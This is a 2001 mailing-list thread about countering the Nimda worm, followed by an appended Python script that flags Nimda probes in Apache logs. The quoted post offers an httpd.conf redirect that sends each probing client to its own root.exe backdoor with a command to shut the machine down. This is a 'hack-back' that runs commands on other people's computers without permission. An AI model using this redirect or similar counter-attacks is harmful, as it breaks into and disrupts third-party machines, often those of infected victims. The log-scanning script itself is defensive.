[NTLUG:Discuss] Possible new nimda counter-attack.

asenec@senechalle.net asenec at senechalle.net
Wed Oct 10 12:14:47 CDT 2001


Send them to http://:81 or some other non-used port.

That will save you some traffic.

Annette

> From discuss-admin at ntlug.org Wed Oct 10 11:28 CDT 2001
> From: "Richard Geoffrion" <ntlug at rain.lewisville.tx.us>
> To: <discuss at ntlug.org>
> Subject: [NTLUG:Discuss] Possible new nimda counter-attack.
> Date: Wed, 10 Oct 2001 11:25:25 -0500
> 
> While researching possible means to counter-attack this dang microsoft.nimda
> virus, I discovered that...
> 
> a)  I can't use high ASCII characters in Linux directory names.
> b)  I can't create a wildcard directory on the reiserfs that would accept
> input from any md command
>     (i.e.:  mkdir * would then be accessible by cd wombat  or cd nonimda -OR-
> in this case "cd scripts")
> 
> But I DID discover something..... EXTERNAL REDIRECTS!  I tested this and
> redirected the URL
> http://rain.lewisville.tx.us/scripts/..%5c../winnt/system32/cmd.exe straight
> to yahoo.com!  Now of course I don't want to go around sending people to
> other websites......hm....just had a thought!  Maybe I DO want to redirect
> them somewhere!?!?  Maybe I could redirect them to the BIGGEST webpage that
> Microsoft has published....anybody know of a good one?
> 
> But I digress....
> 
> Here is what I added to my httpd.conf file.
> 
> # External Redirect of a nimda scan
> <Location /scripts/*/winnt/system32/*>
>     Deny from all
>     ErrorDocument 403
> http://"$REMOTE_ADDR/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWind
> owsEx+5", "r"
> #    ErrorDocument 403 http://www.yahoo.com
> </Location>
> 
> Since I know that this redirect in and of itself works, my question has to
> do with the syntax of the http string.  Can anyone tell me if this is
> correct or help me with the syntax?  I only want to do my part!
> 
> 
> 
> 
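As an added example (not code from either poster), here is a small Python filter that finds the Nimda-style probes quoted above in an Apache access log, undoing the URL-encoding the worm used (`..%5c..` and the doubled `..%255c..` both become `..\..`) and tallying them per source address. That tally is the traffic Annette suggests dumping on an unused port; the log lines below are constructed, with documentation-range IPs.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache common/combined log prefix: client, timestamp, request line, status code
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Signatures taken from the probe URLs in the thread: a traversal (..\ or ../) that
# reaches winnt\system32\cmd.exe, or a call to the root.exe copy the worm leaves behind
PROBE_RE = re.compile(
    r'\.\.[\\/].*winnt[\\/]system32[\\/]cmd\.exe|/root\.exe', re.IGNORECASE
)

def normalise(path):
    # Decode twice: %5c is a backslash, and %255c is a backslash encoded twice
    return unquote(unquote(path))

def is_nimda_probe(path):
    return PROBE_RE.search(normalise(path)) is not None

def parse_line(line):
    """Return the log fields as a dict, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def scan_log(lines):
    """Return (probe count per source IP, list of flagged request paths)."""
    by_ip = Counter()
    flagged = []
    for line in lines:
        rec = parse_line(line)
        if rec and is_nimda_probe(rec['path']):
            by_ip[rec['ip']] += 1
            flagged.append(rec['path'])
    return by_ip, flagged

# Constructed sample log: two probes from one host, a normal request, a double-encoded probe
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2001:11:25:25 -0500] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 210',
    '192.0.2.10 - - [10/Oct/2001:11:25:26 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210',
    '198.51.100.7 - - [10/Oct/2001:11:26:01 -0500] "GET /index.html HTTP/1.1" 200 1043',
    '198.51.100.7 - - [10/Oct/2001:11:26:05 -0500] "GET /_vti_bin/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 290',
]

if __name__ == '__main__':
    counts, paths = scan_log(SAMPLE_LOG)
    for ip, n in counts.most_common():
        print(f'{ip}: {n} probe(s)')
```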


